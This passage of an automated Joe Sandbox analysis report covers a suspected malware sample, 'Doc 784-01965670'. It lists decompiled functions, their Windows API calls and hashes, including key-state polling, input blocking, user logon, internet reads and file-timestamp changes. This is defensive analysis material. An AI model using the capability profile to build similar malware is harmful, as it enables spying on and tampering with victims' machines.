                                                                                                                                    • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                    • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3539004672-0
                                                                                                                                    • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                    • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                                    • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                    • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                                    Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                    • IsWindowVisible.USER32 ref: 00477314
                                                                                                                                    • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                                    • IsIconic.USER32 ref: 0047733F
                                                                                                                                    • IsZoomed.USER32 ref: 0047734D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                    • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                    • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                                    • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                    • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                                    Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                    • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                    • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                                    • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                    • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                                    Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strncmp
                                                                                                                                    • String ID: ACCEPT$^$h
                                                                                                                                    • API String ID: 909875538-4263704089
                                                                                                                                    • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                    • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                                    • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                    • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                                    Function 00446566 Relevance: 5.9, Strings: 4, Instructions: 868COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                                    • API String ID: 0-2165971703
                                                                                                                                    • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                    • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                                    • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                    • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                                    Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                    • Opcode ID: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                                    • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                                    • Opcode Fuzzy Hash: 14602e3ddb85434cb4a191148b4ac58dc13c9e22f939418703ff5d8e88b69fcb
                                                                                                                                    • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                                    Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                    • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                    • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                                    • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                    • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                                    Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __time64.LIBCMT ref: 004433A2
                                                                                                                                      • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                      • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                    • String ID: rJ
                                                                                                                                    • API String ID: 2893107130-1865492326
                                                                                                                                    • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                    • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                                    • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                    • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                                    Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __time64.LIBCMT ref: 004433A2
                                                                                                                                      • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                      • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                    • String ID: rJ
                                                                                                                                    • API String ID: 2893107130-1865492326
                                                                                                                                    • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                    • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                                    • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                    • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                                    Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 901099227-0
                                                                                                                                    • Opcode ID: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                                                                    • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                                    • Opcode Fuzzy Hash: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
                                                                                                                                    • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                                    Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                    • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                                    • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                    • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                                    Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0vH$HH
                                                                                                                                    • API String ID: 0-728391547
                                                                                                                                    • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                    • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                                    • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                    • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                                    Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102423945-0
                                                                                                                                    • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                    • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                                    • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                    • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                                    Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Proc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2346855178-0
                                                                                                                                    • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                    • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                                    • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                    • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                                    Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BlockInput
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                    • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                    • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                    • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                    • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                    Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
